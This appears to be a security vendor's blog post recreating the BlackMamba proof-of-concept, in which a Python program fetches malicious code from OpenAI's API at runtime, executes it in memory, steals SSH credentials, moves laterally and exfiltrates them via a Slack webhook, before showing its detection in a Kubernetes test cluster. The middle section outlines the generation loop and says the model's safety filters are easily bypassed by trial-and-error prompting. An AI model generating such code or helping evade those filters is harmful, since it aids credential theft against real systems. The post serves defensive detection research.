The world of cybersecurity is no stranger to new and dangerous threats. A new proof-of-concept malware has recently emerged that is causing quite a stir. BlackMamba, coined by Hyas in their blog post, is a fascinating application of language models such as OpenAI’s chatGPT. It works by posing as a rather simple python program that flies under the radar of typical security software. However, when it's executed it reaches out to OpenAI’s API to receive malicious code and execute it on the fly. The malicious code exists only in memory of the victim machine and will be different every time you run the program.
In Hyas’ blog, they were able to create a BlackMamba keylogger that would generate the keylogging code in memory and exfiltrate it over a trusted communication channel such as Microsoft Teams. This inspired us at Spyderbat to take our own stab at creating a version of BlackMamba. In our example, we wrote a program that attempts to steal SSH credentials and exfiltrate them via a Slack webhook. Not only that, but it also tries to move laterally across the network to steal credentials from other machines.
To see what this looks like in Spyderbat’s UI you follow this link.
The full breakdown of the code can be found in Hyas’ whitepaper. The concept is to wrap simple functionality around a Code Synthesis function:
- Step 1: Create a loop that includes a call to the Code Synthesis function
- Step 2: Generate and attempt to execute the code
- Step 3: If unsuccessful go back to Step 2. If successful, exfiltrate the data and clean up.
Code Synthesis involves setting up your program with access to the OpenAI API, crafting
Crafting the prompt can be tricky. OpenAI has numerous filters to prevent you from using their tool for malicious purposes. With enough trial and error, it becomes easy enough to bypass the filters. Someone with malicious intent is certainly able to dedicate the time to do that. The engine will also sometimes return code with bugs so the program must be resilient to that. But again you can be more explicit in your prompt and eventually reach a point where bugs show up infrequently. Once the code was generated, we used python’s exec() function to run it on-the-fly.
We chose to use slack webhooks as a way to exfiltrate the data. We had the generated code save all of the SSH credentials to a string variable and then sent it out to our Slack channel via the function below:
Ultimately, the python program can be built into an executable using a tool such as auto-py-to-exe and be executed anywhere. Note: when compiling with auto-py-to-exe or pyinstaller you are building an executable for the OS you’re currently using.
Test Environment & Analysis
With a working version of BlackMamba, we set off to understand what malware like this looks like using Spyderbat. We wanted to see how it would appear in a compromised Kubernetes Cluster so we built out a multi-pod development namespace hosting containers that developers could connect to test and build code. This is what our cluster looks like in the Spyderbat k8s view.
We also built out a policy of “normal” activity using Spyderbat’s automatic Fingerprint feature. Every container that is created on a node running Spyderbat will generate a fingerprint that contains a process tree and both ingress and egress connections.
Fingerprints can be turned into enforceable Policies via the Spyctl tool. Which will then notify you when a container’s activity violates the Policy and take any other supported actions. In this case we opted to not block any activity so it could be viewable in an investigation. The next step was logging into one of the containers and executing our BlackMamba. It immediately showed up in one of our Dashboard cards.
Since we already had a Policy in place for the development container and a Dashboard monitoring for violations of that policy, we were immediately notified that something was amiss and were provided with a link to view the trace in a Spyderbat Investigation.
After following the chain of events we were presented with this view of what happened. We connected in via SSH from an AWS Load Balancer and were given an interactive bash shell. From there, we executed the BlackMamba executable to analyze its behavior. As expected, the malware connected to api.openai.com and generated new code in memory. Upon execution of the code, it extracted SSH credentials and identified a configuration file that enabled it to move laterally to another dev container on the same node. Finally, it exfiltrated the data via the Slack webhook. Sure enough, the Slack channel had the contents of all of the files in the .ssh directory for both containers.
While this is only proof of concept, it was surprisingly easy to use the OpenAI API to generate dubious code in memory and then execute it. This is only the beginning of these types of malware and it’s not farfetched to assume that malicious actors will attempt to use similar methods in the future. Having a tool that can detect and block Zero-Day threats will only become more necessary in the years to come.